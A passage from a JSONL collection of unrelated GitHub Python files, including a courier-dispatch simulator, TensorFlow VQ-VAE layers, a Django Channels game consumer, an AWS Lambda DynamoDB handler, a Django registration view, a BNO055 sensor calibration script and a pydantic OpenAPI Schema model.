%H:%M:%S\"))) - int(\r\n time.mktime(time.strptime(\"2020-10-01 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) )\r\n # 2020-10-12\r\n # order_create_timestep = int((int(time.mktime(time.strptime(iorder[5], \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n # time.mktime(time.strptime(\"2020-10-12 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))))\r\n # time.mktime(time.strptime(\"2020-10-12 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) / 10)\r\n # if order_create_timestep < 0:\r\n # print('debug')\r\n\r\n # 2020-6-6\r\n # if len(iorder[5].split(':')[-1]) > 2:\r\n # order_create_time_str = \"2020-06-06 \"+iorder[5][:-1]\r\n # elif len(iorder[5].split(':')[0]) > 2:\r\n # order_create_time_str = \"2020-06-06 \"+iorder[5][1:]\r\n # elif iorder[5] == '':\r\n # continue\r\n # else:\r\n # order_create_time_str = \"2020-06-06 \"+iorder[5]\r\n # order_create_timestep = int((int(time.mktime(time.strptime(order_create_time_str, \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n # time.mktime(time.strptime(\"2020-06-06 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) / 10)\r\n\r\n # promise_order_deliver_timestep = order_create_timestep + int(int(iorder[15]) / 10)\r\n promise_order_deliver_timestep = order_create_timestep + int(int(iorder[15]))\r\n\r\n price = float(iorder[7])\r\n\r\n # 处理一下输入:之前7-10有些promise=0 的订单需要过滤;\r\n if promise_order_deliver_timestep == order_create_timestep:\r\n continue\r\n\r\n day_orders[order_create_timestep].append(Order(int(iorder[0]), float(iorder[1]), float(iorder[2]),\r\n float(iorder[3]), float(iorder[4]),\r\n order_create_timestep, promise_order_deliver_timestep, price))\r\n count += 1\r\n # print(count)\r\n self.day_orders = day_orders\r\n\r\n def bootstrap_one_day_couriers(self):\r\n # 将骑手数据输入加载入模型\r\n # ['2758233.0', '31.255537', '121.45916', '2020-10-01 12:07:16']\r\n day_couriers = [[] for _ in range(self.n_step)]\r\n for i_couriers in self.courier_init:\r\n # 这里初始化骑手时可以让id为真实id或者虚拟id\r\n # 2020-10-1\r\n first_occur_time_step = int((int(time.mktime(time.strptime(i_couriers[3], \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n time.mktime(time.strptime(\"2020-10-01 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) )\r\n # 2020-10-12\r\n # first_occur_time_step = int((int(time.mktime(time.strptime(i_couriers[3], \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n # time.mktime(time.strptime(\"2020-10-12 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))))\r\n # time.mktime(time.strptime(\"2020-10-12 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) / 10)\r\n # 2020-6-6\r\n # if len(i_couriers[3].split(':')[-1]) > 2:\r\n # first_occur_time_str = \"2020-06-06 \"+i_couriers[3][:-1]\r\n # elif len(i_couriers[3].split(':')[0]) > 2:\r\n # first_occur_time_str = \"2020-06-06 \"+i_couriers[3][1:]\r\n # elif i_couriers[3] == '':\r\n # continue\r\n # else:\r\n # first_occur_time_str = \"2020-06-06 \"+i_couriers[3]\r\n # first_occur_time_step = int((int(time.mktime(time.strptime(first_occur_time_str, \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n # time.mktime(time.strptime(\"2020-06-06 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) / 10)\r\n\r\n c = Courier(int(float(i_couriers[0])), float(i_couriers[1]), float(i_couriers[2]), first_occur_time_step)\r\n day_couriers[first_occur_time_step].append(c)\r\n self.couriers_dict[int(float(i_couriers[0]))] = c\r\n self.day_couriers = day_couriers\r\n\r\n def env_initialize(self):\r\n self.city_time = 0\r\n self.bootstrap_one_day_orders()\r\n self.bootstrap_one_day_couriers()\r\n # self.step_bootstrap_order(self.day_orders[self.city_time], self.city_time)\r\n # self.step_bootstrap_couriers(self.day_couriers[self.city_time], self.city_time)\r\n\r\n def day_couriers_update(self, order_time):\r\n # couriers_info_collect 调用的骑手对象\r\n couriers_list_before_curtime = []\r\n for time_count in range(order_time + 1):\r\n for ic in self.day_couriers[time_count]:\r\n couriers_list_before_curtime.append(ic)\r\n return couriers_list_before_curtime\r\n\r\n def couriers_info_collect(self, one_order, T):\r\n order_time_slot = T\r\n courier_distance = [] # 骑手和商家间的距离\r\n couriers_ = [] # 该时刻可以接单的骑手列表(在线骑手)\r\n # cost_time = [] # 计算商家-用户间骑手配送需要的额外时间\r\n\r\n # to do :\r\n # day_couriers 每个时间步的 骑手信息需要更新,类似 env.step_couriers_state_update函数控制.online状态\r\n # self.occur_time 为 骑手第一次出现的时刻,就让这个骑手继续接单,在该时刻继续接单,更新day_couriers(根据couriers_dist_time)\r\n\r\n # ——solution:若当前时间步有订单,看系统当前已出现了的骑手的位置(最近时刻记录的位置),将最近的骑手派给他。\r\n couriers_time_before = self.day_couriers_update(order_time_slot)\r\n for ic in couriers_time_before:\r\n # courier.full状态,骑手接一个单时,判断与capacity的大小,满了就不考虑该骑手\r\n if not ic.full and ic.cur_order_num <= ic.capacity:\r\n couriers_.append(ic)\r\n courier_distance.append(get_distance_hav(ic.lat, ic.lon, float(one_order.shop_latitude),\r\n float(one_order.shop_longitude)))\r\n # cost_time.append((ic, ic.take_order_temp(one_order)))\r\n\r\n return couriers_, courier_distance\r\n","repo_name":"DHCAC2022/DHCAC","sub_path":"simulator/envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":7947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27710956143","text":"import tensorflow as tf\nfrom functools import reduce\n\n\nclass PreNet(tf.layers.Layer):\n\n def __init__(self, out_units,\n trainable=True, name=None, dtype=None, **kwargs):\n super(PreNet, self).__init__(trainable=trainable, name=name, dtype=dtype,\n **kwargs)\n\n self._conv2d = tf.layers.Conv2D(out_units,\n kernel_size=(1, 1),\n strides=(1, 1),\n padding='SAME')\n\n def call(self, inputs, **kwargs):\n return self._conv2d(inputs)\n\n\nclass ResidualBlock(tf.layers.Layer):\n\n def __init__(self, out_units, residual_index, num_residual_hiddens,\n trainable=True, name=None, dtype=None, **kwargs):\n super(ResidualBlock, self).__init__(trainable=trainable, name=name, dtype=dtype,\n **kwargs)\n\n self._res3x3 = tf.layers.Conv2D(filters=num_residual_hiddens,\n kernel_size=(3, 3),\n strides=(1, 1),\n padding='SAME',\n activation=tf.nn.relu,\n name=f\"res3x3_{residual_index}\")\n\n self._res1x1 = tf.layers.Conv2D(filters=out_units,\n kernel_size=(1, 1),\n strides=(1, 1),\n padding='SAME',\n activation=None,\n name=f\"res1x1_{residual_index}\")\n\n def call(self, inputs, **kwargs):\n h_i = self._res3x3(inputs)\n h_i = self._res1x1(h_i)\n h_i += inputs\n return tf.nn.relu(h_i)\n\n\nclass ResidualStack(tf.layers.Layer):\n\n def __init__(self, num_hiddens, num_residual_layers, num_residual_hiddens,\n trainable=True, name=None, dtype=None, **kwargs):\n super(ResidualStack, self).__init__(trainable=trainable, name=name, dtype=dtype,\n **kwargs)\n\n self._residual_layers = [ResidualBlock(num_hiddens, i, num_residual_hiddens, name=f\"residual_block_{i}\") for i\n in range(num_residual_layers)]\n\n def call(self, inputs, **kwargs):\n return reduce(lambda acc, l: l(acc), self._residual_layers, inputs)\n\n\nclass Encoder(tf.layers.Layer):\n\n def __init__(self, num_hiddens, num_residual_layers, num_residual_hiddens,\n trainable=True, name=None, dtype=None, **kwargs):\n super(Encoder, self).__init__(trainable=trainable, name=name, dtype=dtype,\n **kwargs)\n\n conv2d_1 = tf.layers.Conv2D(filters=num_hiddens // 2,\n kernel_size=(4, 4),\n strides=(2, 2),\n padding='SAME',\n activation=tf.nn.relu)\n\n conv2d_2 = tf.layers.Conv2D(filters=num_hiddens,\n kernel_size=(4, 4),\n strides=(2, 2),\n padding='SAME',\n activation=tf.nn.relu)\n\n conv2d_3 = tf.layers.Conv2D(filters=num_hiddens,\n kernel_size=(3, 3),\n strides=(1, 1),\n padding='SAME',\n activation=tf.nn.relu)\n\n self._convolutions = [conv2d_1, conv2d_2, conv2d_3]\n self._residual_stack = ResidualStack(num_hiddens, num_residual_layers, num_residual_hiddens)\n\n def call(self, inputs, **kwargs):\n output_convs = reduce(lambda acc, l: l(acc), self._convolutions, inputs)\n residual_output = self._residual_stack(output_convs)\n return residual_output\n\n\nclass Decoder(tf.layers.Layer):\n\n def __init__(self, out_units, num_hiddens, num_residual_layers, num_residual_hiddens,\n trainable=True, name=None, dtype=None, **kwargs):\n super(Decoder, self).__init__(trainable=trainable, name=name, dtype=dtype,\n **kwargs)\n\n conv2d_1 = tf.layers.Conv2D(filters=num_hiddens,\n kernel_size=(3, 3),\n strides=(1, 1),\n padding='SAME',\n activation=tf.nn.relu)\n\n residual_stack = ResidualStack(num_hiddens, num_residual_layers, num_residual_hiddens)\n\n conv2dt_1 = tf.layers.Conv2DTranspose(filters=num_hiddens // 2,\n kernel_size=(4, 4),\n strides=(2, 2),\n padding='SAME',\n activation=tf.nn.relu)\n\n conv2dt_2 = tf.layers.Conv2DTranspose(filters=out_units,\n kernel_size=(4, 4),\n strides=(2, 2),\n padding='SAME',\n activation=None)\n\n self._layers = [conv2d_1, residual_stack, conv2dt_1, conv2dt_2]\n\n def call(self, inputs, **kwargs):\n reconstruction = reduce(lambda acc, l: l(acc), self._layers, inputs)\n return reconstruction\n","repo_name":"TanUkkii007/vqvae","sub_path":"image2d/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":5556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"2676680841","text":"from django.utils import timezone\nfrom django.conf import settings\n\nfrom .utils import log_to_terminal, fc7_sort\nfrom .sender import chatbot\nimport constants as constants\nfrom .models import GameRound, ImageRanking\n\nfrom channels import Group\n\nimport json\nimport redis\nimport datetime\nimport os\nimport shutil\nimport pdb\n\n\nr = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n\ndef ws_connect(message):\n \"Method called when a user is connected through SocketIO\"\n pass\n\n\ndef ws_message(message):\n \"Method called when there is message from the SocketIO client\"\n\n body = json.loads(message.content['text'])\n\n if body[\"event\"] == \"ConnectionEstablished\":\n # Event when the user is connected to the socketio client\n Group(body[\"socketid\"]).add(message.reply_channel)\n log_to_terminal(body[\"socketid\"], {\n \"info\": \"User added to the Channel Group\"})\n\n elif body[\"event\"] == \"start\":\n # Event when the user starts to play the game\n current_datetime = timezone.now()\n r.set(\"start_time_{}\".format(\n body[\"socketid\"]),\n current_datetime.strftime(\"%I:%M%p on %B %d, %Y\"))\n\n elif body[\"event\"] == \"questionSubmitted\":\n # Event when the user submits a question to the backend\n body['question'] = body['question'].lower()\n bot = body['bot']\n chatbot(body['question'],\n body['prev_history'],\n os.path.join(settings.BASE_DIR, body['target_image'][1:]),\n body[\"socketid\"],\n bot)\n\n elif body['event'] == \"imageSubmitted\":\n # Event when the user selects an image after each round of a game\n GameRound.objects.create(\n socket_id=body['socketid'],\n user_picked_image=body['user_picked_image'],\n worker_id=body['worker_id'],\n assignment_id=body['assignment_id'],\n level=body['level'],\n hit_id=body['hit_id'],\n game_id=body['game_id'],\n round_id=body['round_id'],\n question=body['question'],\n answer=body['answer'].replace(\"\", \"\").replace(\"\", \"\"),\n history=body['history'],\n target_image=body['target_image'],\n bot=body['bot'],\n task=body['task'],\n )\n log_to_terminal(body[\"socketid\"], {\"image_selection_result\": True})\n\n elif body['event'] == 'finalImagesSelected':\n # Event when the user submit the ranking of after completing all rounds\n ImageRanking.objects.create(\n socket_id=body['socketid'],\n final_image_list=body['final_image_list'],\n worker_id=body['worker_id'],\n assignment_id=body['assignment_id'],\n level=body['level'],\n hit_id=body['hit_id'],\n game_id=body['game_id'],\n bot=body['bot'],\n target_image=body['target_image'],\n score=body['bonus'],\n task=body['task'],\n )\n\n\ndef ws_disconnect(message):\n \"Method invoked when the client disconnects the socket connection\"\n pass\n","repo_name":"GT-Vision-Lab/GuessWhich","sub_path":"amt/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"69"}
+{"seq_id":"26681966456","text":"import json\nimport boto3\n\nconn_ddb = boto3.resource('dynamodb').Table('clients')\n\n\ndef update_client(event, context):\n try:\n id = event[\"pathParameters\"][\"id\"]\n body = json.loads(event[\"body\"])\n client = {\n \"id\": id,\n \"name\": body[\"name\"]\n }\n conn_ddb.put_item(Item=client)\n response = {\"statusCode\": 200, \"body\": json.dumps({\"client\": client})}\n return response\n except Exception as e:\n response = {\"statusCode\": 400, \"body\": json.dumps({\"error\": \"Bad request\"+str(e)})}\n return response","repo_name":"MartinsMessias/serverless_api_crud_aws","sub_path":"clients/update_client.py","file_name":"update_client.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"70026225819","text":"# register/views.py\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.shortcuts import render, redirect\n\ndef register_view(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n # Redirect to login or home page after successful registration\n return redirect('login') # Replace 'login' with your login URL\n else:\n form = UserCreationForm()\n\n return render(request, 'register/register.html', {'form': form})\n","repo_name":"abdullah21079/OCRS-Update","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21304648391","text":"import adafruit_bno055\nimport board\n#import zmq\n\nfrom json import dumps \nfrom signal import SIGINT, signal\nfrom sys import exit\nfrom time import sleep, time_ns\n\n# Sample rate (seconds)\nsample_rate = 1\n\n# BNO055 sensor board\nbno055 = adafruit_bno055.BNO055_I2C(board.I2C())\n\n# Set config mode\nprint('Set `CONFIG_MODE`')\nprint(f\"current_mode = {bno055.mode}\")\n#bno055.mode = adafruit_bno055.CONFIG_MODE\nbno055.mode = adafruit_bno055.NDOF_FMC_OFF_MODE\n\nprint(\"Updated mode\")\nprint(f\"bno055.mode = {bno055.mode}\")\n\ndef status() -> str:\n while True:\n yield dumps({\n 'timestamp': time_ns(),\n 'calibrated': bno055.calibrated,\n 'calibration_status': { k:v for (k,v) in zip(['sys', 'gyro', 'accel', 'mag'], bno055.calibration_status) }\n })\n sleep(sample_rate)\n\ndef close(signum, frame):\n print('Set mode to `NDOF_MODE`')\n bno055.mode = adafruit_bno055.NDOF_MODE\n\n print('Closing...')\n print(f'signum: {signum}')\n print(f'frame: {frame}')\n exit()\n \nsignal(SIGINT, close)\n\nstatus = status()\n\nwhile True:\n print(next(status))\n","repo_name":"jagrafft/iot-data-stream-utils","sub_path":"iot_zmq_publishers/devices/BNO055/calibrate_BNO055.py","file_name":"calibrate_BNO055.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4867069896","text":"from typing import Any, Dict, List, Optional, Union\n\nfrom pydantic import BaseModel, Extra, Field\nfrom .discriminator import Discriminator\nfrom .external_documentation import ExternalDocumentation\nfrom .reference import Reference\nfrom .xml import XML\n\n\nclass Schema(BaseModel):\n \"\"\"\n The Schema Object allows the definition of input and output data types.\n These types can be objects, but also primitives and arrays.\n This object is an extended subset of the [JSON Schema Specification Wright Draft 00](https://json-schema.org/).\n\n For more information about the properties,\n see [JSON Schema Core](https://tools.ietf.org/html/draft-wright-json-schema-00)\n and [JSON Schema Validation](https://tools.ietf.org/html/draft-wright-json-schema-validation-00).\n Unless stated otherwise, the property definitions follow the JSON Schema.\n \"\"\"\n\n \"\"\"\n The following properties are taken directly from the JSON Schema definition and follow the same specifications:\n \"\"\"\n\n title: Optional[str] = None\n \"\"\"\n The value of \"title\" MUST be a string.\n\n The title can be used to decorate a user interface with\n information about the data produced by this user interface.\n The title will preferrably be short.\n \"\"\"\n\n multipleOf: Optional[float] = Field(default=None, gt=0.0)\n \"\"\"\n The value of \"multipleOf\" MUST be a number, strictly greater than 0.\n \n A numeric instance is only valid if division by this keyword's value\n results in an integer.\n \"\"\"\n\n maximum: Optional[float] = None\n \"\"\"\n The value of \"maximum\" MUST be a number, representing an upper limit\n for a numeric instance.\n \n If the instance is a number, then this keyword validates if\n \"exclusiveMaximum\" is true and instance is less than the provided\n value, or else if the instance is less than or exactly equal to the\n provided value.\n \"\"\"\n\n exclusiveMaximum: Optional[bool] = None\n \"\"\"\n The value of \"exclusiveMaximum\" MUST be a boolean, representing\n whether the limit in \"maximum\" is exclusive or not. An undefined\n value is the same as false.\n \n If \"exclusiveMaximum\" is true, then a numeric instance SHOULD NOT be\n equal to the value specified in \"maximum\". If \"exclusiveMaximum\" is\n false (or not specified), then a numeric instance MAY be equal to the\n value of \"maximum\".\n \"\"\"\n\n minimum: Optional[float] = None\n \"\"\"\n The value of \"minimum\" MUST be a number, representing a lower limit\n for a numeric instance.\n \n If the instance is a number, then this keyword validates if\n \"exclusiveMinimum\" is true and instance is greater than the provided\n value, or else if the instance is greater than or exactly equal to\n the provided value.\n \"\"\"\n\n exclusiveMinimum: Optional[bool] = None\n \"\"\"\n The value of \"exclusiveMinimum\" MUST be a boolean, representing\n whether the limit in \"minimum\" is exclusive or not. An undefined\n value is the same as false.\n \n If \"exclusiveMinimum\" is true, then a numeric instance SHOULD NOT be\n equal to the value specified in \"minimum\". If \"exclusiveMinimum\" is\n false (or not specified), then a numeric instance MAY be equal to the\n value of \"minimum\".\n \"\"\"\n\n maxLength: Optional[int] = Field(default=None, ge=0)\n \"\"\"\n The value of this keyword MUST be a non-negative integer.\n\n The value of this keyword MUST be an integer. This integer MUST be\n greater than, or equal to, 0.\n \n A string instance is valid against this keyword if its length is less\n than, or equal to, the value of this keyword.\n \n The length of a string instance is defined as the number of its\n characters as defined by RFC 7159 [RFC7159].\n \"\"\"\n\n minLength: Optional[int] = Field(default=None, ge=0)\n \"\"\"\n A string instance is valid against this keyword if its length is\n greater than, or equal to, the value of this keyword.\n \n The length of a string instance is defined as the number of its\n characters as defined by RFC 7159 [RFC7159].\n \n The value of this keyword MUST be an integer. This integer MUST be\n greater than, or equal to, 0.\n \n \"minLength\", if absent, may be considered as being present with\n integer value 0.\n \"\"\"\n\n pattern: Optional[str] = None\n \"\"\"\n The value of this keyword MUST be a string. This string SHOULD be a\n valid regular expression, according to the ECMA 262 regular\n expression dialect.\n \n A string instance is considered valid if the regular expression\n matches the instance successfully. Recall: regular expressions are\n not implicitly anchored.\n \"\"\"\n\n maxItems: Optional[int] = Field(default=None, ge=0)\n \"\"\"\n The value of this keyword MUST be an integer. This integer MUST be\n greater than, or equal to, 0.\n \n An array instance is valid against \"maxItems\" if its size is less\n than, or equal to, the value of this keyword.\n \"\"\"\n\n minItems: Optional[int] = Field(default=None, ge=0)\n \"\"\"\n The value of this keyword MUST be an integer. This integer MUST be\n greater than, or equal to, 0.\n \n An array instance is valid against \"minItems\" if its size is greater\n than, or equal to, the value of this keyword.\n \n If this keyword is not present, it may be considered present with a\n value of 0.\n \"\"\"\n\n uniqueItems: Optional[bool] = None\n \"\"\"\n The value of this keyword MUST be a boolean.\n\n If this keyword has boolean value false, the instance validates\n successfully. If it has boolean value true, the instance validates\n successfully if all of its elements are unique.\n \n If not present, this keyword may be considered present with boolean\n value false.\n \"\"\"\n\n maxProperties: Optional[int] = Field(default=None, ge=0)\n \"\"\"\n The value of this keyword MUST be an integer. This integer MUST be\n greater than, or equal to, 0.\n \n An object instance is valid against \"maxProperties\" if its number of\n properties is less than, or equal to, the value of this keyword.\n \"\"\"\n\n minProperties: Optional[int] = Field(default=None, ge=0)\n \"\"\"\n The value of this keyword MUST be an integer. This integer MUST be\n greater than, or equal to, 0.\n \n An object instance is valid against \"minProperties\" if its number of\n properties is greater than, or equal to, the value of this keyword.\n \n If this keyword is not present, it may be considered present with a\n value of 0.\n \"\"\"\n\n required: Optional[List[str]] = Field(default=None, min_items=1)\n \"\"\"\n The value of this keyword MUST be an array. This array MUST have at\n least one element. Elements of this array MUST be strings, and MUST\n be unique.\n \n An object instance is valid against this keyword if its property set\n contains all elements in this keyword's array value.\n \"\"\"\n\n enum: Optional[List[Any]] = Field(default=None, min_items=1)\n \"\"\"\n The value of this keyword MUST be an array. This array SHOULD have\n at least one element. Elements in the array SHOULD be unique.\n \n Elements in the array MAY be of any type, including null.\n \n An instance validates successfully against this keyword if its value\n is equal to one of the elements in this keyword's array value.\n \"\"\"\n\n \"\"\"\n The following properties are taken from the JSON Schema definition\n but their definitions were adjusted to the OpenAPI Specification.\n \"\"\"\n\n type: Optional[str] = None\n \"\"\"\n **From OpenAPI spec:\n Value MUST be a string. Multiple types via an array are not supported.**\n \n From JSON Schema:\n The value of this keyword MUST be either a string or an array. If it\n is an array, elements of the array MUST be strings and MUST be\n unique.\n \n String values MUST be one of the seven primitive types defined by the\n core specification.\n \n An instance matches successfully if its primitive type is one of the\n types defined by keyword. Recall: \"number\" includes \"integer\".\n \"\"\"\n\n allOf: Optional[List[Union[Reference, \"Schema\"]]] = None\n \"\"\"\n **From OpenAPI spec:\n Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.**\n \n From JSON Schema:\n This keyword's value MUST be an array. This array MUST have at least\n one element.\n \n Elements of the array MUST be objects. Each object MUST be a valid\n JSON Schema.\n \n An instance validates successfully against this keyword if it\n validates successfully against all schemas defined by this keyword's\n value.\n \"\"\"\n\n oneOf: Optional[List[Union[Reference, \"Schema\"]]] = None\n \"\"\"\n **From OpenAPI spec:\n Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.**\n \n From JSON Schema:\n This keyword's value MUST be an array. This array MUST have at least\n one element.\n \n Elements of the array MUST be objects. Each object MUST be a valid\n JSON Schema.\n \n An instance validates successfully against this keyword if it\n validates successfully against exactly one schema defined by this\n keyword's value.\n \"\"\"\n\n anyOf: Optional[List[Union[Reference, \"Schema\"]]] = None\n \"\"\"\n **From OpenAPI spec:\n Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.**\n \n From JSON Schema:\n This keyword's value MUST be an array. This array MUST have at least\n one element.\n \n Elements of the array MUST be objects. Each object MUST be a valid\n JSON Schema.\n \n An instance validates successfully against this keyword if it\n validates successfully against at least one schema defined by this\n keyword's value.\n \"\"\"\n\n schema_not: Optional[Union[Reference, \"Schema\"]] = Field(default=None, alias=\"not\")\n \"\"\"\n **From OpenAPI spec:\n Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.**\n \n From JSON Schema:\n This keyword's value MUST be an object. This object MUST be a valid\n JSON Schema.\n \n An instance is valid against this keyword if it fails to validate\n successfully against the schema defined by this keyword.\n \"\"\"\n\n items: Optional[Union[Reference, \"Schema\"]] = None\n \"\"\"\n **From OpenAPI spec:\n Value MUST be an object and not an array.\n Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.\n `items` MUST be present if the `type` is `array`.**\n \n From JSON Schema:\n The value of \"items\" MUST be either a schema or array of schemas.\n\n Successful validation of an array instance with regards to these two\n keywords is determined as follows:\n \n - if \"items\" is not present, or its value is an object, validation\n of the instance always succeeds, regardless of the value of\n \"additionalItems\";\n - if the value of \"additionalItems\" is boolean value true or an\n object, validation of the instance always succeeds;\n - if the value of \"additionalItems\" is boolean value false and the\n value of \"items\" is an array, the instance is valid if its size is\n less than, or equal to, the size of \"items\".\n \"\"\"\n\n properties: Optional[Dict[str, Union[Reference, \"Schema\"]]] = None\n \"\"\"\n **From OpenAPI spec:\n Property definitions MUST be a [Schema Object](#schemaObject)\n and not a standard JSON Schema (inline or referenced).**\n \n From JSON Schema:\n The value of \"properties\" MUST be an object. Each value of this\n object MUST be an object, and each object MUST be a valid JSON\n Schema.\n \n If absent, it can be considered the same as an empty object.\n \"\"\"\n\n additionalProperties: Optional[Union[bool, Reference, \"Schema\"]] = None\n \"\"\"\n **From OpenAPI spec:\n Value can be boolean or object.\n Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.\n Consistent with JSON Schema, `additionalProperties` defaults to `true`.**\n \n From JSON Schema:\n The value of \"additionalProperties\" MUST be a boolean or a schema.\n\n If \"additionalProperties\" is absent, it may be considered present\n with an empty schema as a value.\n \n If \"additionalProperties\" is true, validation always succeeds.\n \n If \"additionalProperties\" is false, validation succeeds only if the\n instance is an object and all properties on the instance were covered\n by \"properties\" and/or \"patternProperties\".\n \n If \"additionalProperties\" is an object, validate the value as a\n schema to all of the properties that weren't validated by\n \"properties\" nor \"patternProperties\".\n \"\"\"\n\n description: Optional[str] = None\n \"\"\"\n **From OpenAPI spec:\n [CommonMark syntax](https://spec.commonmark.org/) MAY be used for rich text representation.**\n \n From JSON Schema:\n The value \"description\" MUST be a string.\n\n The description can be used to decorate a user interface with\n information about the data produced by this user interface.\n The description will provide explanation about the purpose of\n the instance described by this schema.\n \"\"\"\n\n schema_format: Optional[str] = Field(default=None, alias=\"format\")\n \"\"\"\n **From OpenAPI spec:\n [Data Type Formats](#dataTypeFormat) for further details.\n While relying on JSON Schema's defined formats, the OAS offers a few additional predefined formats.**\n \n From JSON Schema:\n Structural validation alone may be insufficient to validate that an\n instance meets all the requirements of an application. The \"format\"\n keyword is defined to allow interoperable semantic validation for a\n fixed subset of values which are accurately described by\n authoritative resources, be they RFCs or other external\n specifications.\n \n The value of this keyword is called a format attribute. It MUST be a\n string. A format attribute can generally only validate a given set\n of instance types. If the type of the instance to validate is not in\n this set, validation for this format attribute and instance SHOULD\n succeed.\n \"\"\"\n\n default: Optional[Any] = None\n \"\"\"\n **From OpenAPI spec:\n The default value represents what would be assumed by the consumer of the input\n as the value of the schema if one is not provided.\n Unlike JSON Schema, the value MUST conform to the defined type for the Schema Object defined at the same level.\n For example, if `type` is `string`, then `default` can be `\"foo\"` but cannot be `1`.**\n \n From JSON Schema:\n There are no restrictions placed on the value of this keyword.\n \n This keyword can be used to supply a default JSON value associated\n with a particular schema. It is RECOMMENDED that a default value be\n valid against the associated schema.\n \n This keyword MAY be used in root schemas, and in any subschemas.\n \"\"\"\n\n \"\"\"\n Other than the JSON Schema subset fields, the following fields MAY be used for further schema documentation:\n \"\"\"\n\n nullable: Optional[bool] = None\n \"\"\"\n A `true` value adds `\"null\"` to the allowed type specified by the `type` keyword,\n only if `type` is explicitly defined within the same Schema Object.\n Other Schema Object constraints retain their defined behavior,\n and therefore may disallow the use of `null` as a value.\n A `false` value leaves the specified or default `type` unmodified.\n The default value is `false`.\n \"\"\"\n\n discriminator: Optional[Discriminator] = None\n \"\"\"\n Adds support for polymorphism.\n The discriminator is an object name that is used to differentiate between other schemas\n which may satisfy the payload description.\n See [Composition and Inheritance](#schemaComposition) for more details.\n \"\"\"\n\n readOnly: Optional[bool] = None\n \"\"\"\n Relevant only for Schema `\"properties\"` definitions.\n Declares the property as \"read only\".\n This means that it MAY be sent as part of a response but SHOULD NOT be sent as part of the request.\n If the property is marked as `readOnly` being `true` and is in the `required` list,\n the `required` will take effect on the response only.\n A property MUST NOT be marked as both `readOnly` and `writeOnly` being `true`.\n Default value is `false`.\n \"\"\"\n\n writeOnly: Optional[bool] = None\n \"\"\"\n Relevant only for Schema `\"properties\"` definitions.\n Declares the property as \"write only\".\n Therefore, it MAY be sent as part of a request but SHOULD NOT be sent as part of the response.\n If the property is marked as `writeOnly` being `true` and is in the `required` list,\n the `required` will take effect on the request only.\n A property MUST NOT be marked as both `readOnly` and `writeOnly` being `true`.\n Default value is `false`.\n \"\"\"\n\n xml: Optional[XML] = None\n \"\"\"\n This MAY be used only on properties schemas.\n It has no effect on root schemas.\n Adds additional metadata to describe the XML representation of this property.\n \"\"\"\n\n externalDocs: Optional[ExternalDocumentation] = None\n \"\"\"\n Additional external documentation for this schema.\n \"\"\"\n\n example: Optional[Any] = None\n \"\"\"\n A free-form property to include an example of an instance for this schema.\n To represent examples that cannot be naturally represented in JSON or YAML,\n a string value can be used to contain the example with escaping where necessary.\n \"\"\"\n\n deprecated: Optional[bool] = None\n \"\"\" \n Specifies that a schema is deprecated and SHOULD be transitioned out of usage.\n Default value is `false`.\n \"\"\"\n\n class Config:\n extra = Extra.ignore\n allow_population_by_field_name = True\n schema_extra = {\n \"examples\": [\n {\"type\": \"string\", \"format\": \"email\"},\n {\n \"type\": \"object\",\n \"required\": [\"name\"],\n \"properties\": {\n \"name\": {\"type\": \"string\"},\n \"address\": {\"$ref\": \"#/components/schemas/Address\"},\n \"age\": {\"type\": \"integer\", \"format\": \"int32\", \"minimum\": 0},\n },\n },\n {\"type\": \"object\", \"additionalProperties\": {\"type\": \"string\"}},\n {\"type\": \"object\", \"additionalProperties\": {\"$ref\": \"#/components/schemas/ComplexModel\"}},\n {\n \"type\": \"object\",\n \"properties\": {\"id\": {\"type\": \"integer\", \"format\": \"int64\"}, \"name\": {\"type\": \"string\"}},\n \"required\": [\"name\"],\n \"example\": {\"name\": \"Puma\", \"id\": 1},\n },\n {\n \"type\": \"object\",\n \"required\": [\"message\", \"code\"],\n \"properties\": {\n \"message\": {\"type\": \"string\"},\n \"code\": {\"type\": \"integer\", \"minimum\": 100, \"maximum\": 600},\n },\n },\n {\n \"allOf\": [\n {\"$ref\": \"#/components/schemas/ErrorModel\"},\n {\"type\": \"object\", \"required\": [\"rootCause\"], \"properties\": {\"rootCause\": {\"type\": \"string\"}}},\n ]\n },\n {\n \"type\": \"object\",\n \"discriminator\": {\"propertyName\": \"petType\"},\n \"properties\": {\"name\": {\"type\": \"string\"}, \"petType\": 